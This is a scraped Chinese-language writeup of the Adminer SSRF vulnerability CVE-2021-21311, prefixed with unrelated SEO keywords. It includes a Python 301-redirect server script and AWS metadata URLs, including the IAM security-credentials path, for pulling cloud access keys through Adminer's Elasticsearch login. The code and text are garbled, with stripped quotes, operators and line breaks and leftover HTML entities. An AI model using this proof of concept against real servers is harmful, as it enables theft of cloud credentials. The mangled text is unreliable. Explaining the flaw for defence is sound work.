做国际物流在哪些网站找客户,大型网站建设的价格,申请免费网站域名,移动互联网开发培训Adminer是一个PHP编写的开源数据库管理工具#xff0c;支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。
在其4.0.0到4.7.9版本之间#xff0c;连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞#xff08…Adminer是一个PHP编写的开源数据库管理工具支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。
在其4.0.0到4.7.9版本之间连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞SSRF。 参考连接
https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml 1.在Adminer登录页面选择ElasticSearch作为系统目标并在server字段填写example.com点击登录即可看到example.com返回的400错误页面展示在页面中 Vulnerability-Wiki/docs-base/docs/webapp/Adminer-SSRF漏洞-CVE-2021-21311.md at master · Threekiii/Vulnerability-Wiki (github.com)
使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。
参考链接
SSRF in adminer · CVE-2021-21311 · GitHub Advisory Database · GitHubhttps://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd
首先启动一个python服务器该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下重定向指向AWS元数据服务
http://169.254.169.254/latest/meta-data/instance-id然后在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。
重定向请求的python脚本
#!/usr/bin/env pythonimport SimpleHTTPServer
import SocketServer
import sys
import argparsedef redirect_handler_factory(url):Returns a request handler class that redirects to supplied urlclass RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):def do_GET(self):self.send_response(301)self.send_header(Location, url)self.end_headers()def do_POST(self):self.send_response(301)self.send_header(Location, url)self.end_headers()return RedirectHandlerdef main():parser argparse.ArgumentParser(descriptionHTTP redirect server)parser.add_argument(--port, -p, actionstore, typeint, default80, helpport to listen on)parser.add_argument(--ip, -i, actionstore, default, helphost interface to listen on)parser.add_argument(redirect_url, actionstore)myargs parser.parse_args()redirect_url myargs.redirect_urlport myargs.porthost myargs.ipredirectHandler redirect_handler_factory(redirect_url)handler SocketServer.TCPServer((host, port), redirectHandler)print(serving at port %s % port)handler.serve_forever()if __name__ __main__:main()
http://169.254.169.254/latest/meta-data/iam/security-credentials/ //列出服务器的可用角色。
